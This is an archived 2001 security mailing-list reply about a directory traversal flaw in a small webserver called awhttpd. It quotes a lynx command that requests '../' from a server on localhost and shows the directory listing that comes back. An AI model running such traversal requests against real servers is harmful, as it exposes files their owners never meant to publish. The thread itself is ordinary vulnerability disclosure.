Re: Severe Vuln. in "secure" webserver.

From: Larry W. Cashdollar (lwcat_private)
Date: Tue Nov 27 2001 - 10:01:08 PST

  • Next message: H C: "Re: Malicious use of grc.com"

    You forgot the "http://"
    
    -- Larry
    
    --------------------Snip---------------------------
    GOBBLES@localhost:/tmp/awhttpd$ lynx -dump localhost:8000/../ >GOBBLES
    GOBBLES@localhost:/tmp/awhttpd$ cat GOBBLES
    
    Current directory is /tmp/awhttpd/
    
        -rw-------    1 GOBBLES  hackers       1786 Jul 21 14:34 [1]CHANGES
        -rw-------    1 GOBBLES  hackers          0 Nov 26 09:10 [2]GOBBLES
    -----------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Tue Nov 27 2001 - 11:20:32 PST